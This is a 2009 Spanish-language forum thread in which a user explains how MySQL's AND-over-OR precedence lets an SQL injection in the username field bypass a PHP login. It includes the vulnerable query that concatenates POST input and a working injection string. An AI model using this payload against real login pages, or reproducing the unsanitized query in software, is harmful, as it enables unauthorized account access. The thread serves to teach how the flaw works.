SQL Injection con Orden de Preferencia en MySQL

DragoN · 02-Aug-2009, 22:14

En infomática por regla general la multiplicación y la división tienen preferencia sobre operaciones como la suma y la resta. Algo similar tambien sucede con operaciones lógicas como AND y OR. Las ANDs tienen preferencia sobre las OR. Una mala construcción de una consulta SQL nos puede jugar malas pasadas:

Código:

select true and false --> FALSE
select true or true and false --> TRUE

Esta característica se puede utilizar para saltarse mediante injección SQL paginas de login (en este caso PHP) que tengan una consulta así:

Código:

$sql = "
   SELECT * 
   FROM users 
   WHERE username='".$_POST["username"]."' AND password='".md5($_POST["psw"])."'";

Como vemos el campo password no es injectable ya que cualquier valor introducido es filtrado por una función. En este caso un hash md5.
El único parámetro injectable es username. Pongamos lo que pongamos en username siempre arrastraremos un "AND password=md5()" que por tanto deberá evaluarse.

Si tenemos en cuenta la prioridad en las operaciones AND/OR de MySQL podemos injectar con:

Código:

Username: ' or username<>'' or password<>'
Password: foo

La consulta SQL queda así:

Código:

SELECT * 
FROM users 
WHERE username='' or username<>'' or password<>'' 
      AND password='acbd18db4cc2f85cedef654fccc4a4d8'

La consulta siempre será evaluada a TRUE.

Visto en el blog de amperis

Epsilon · 02-Aug-2009, 23:39

Se te olvida lo mas importante -- da mas xDD

axy · 04-Aug-2009, 12:34

Bueno el aporte, es increible como a pesar de lo vieja que es este tipo de tecnica todavia se encuentren cosas nuevas, ayer lei algo sobre las serialized sql injection y pues es notable lo versatil de esta tecnica.

Saludos..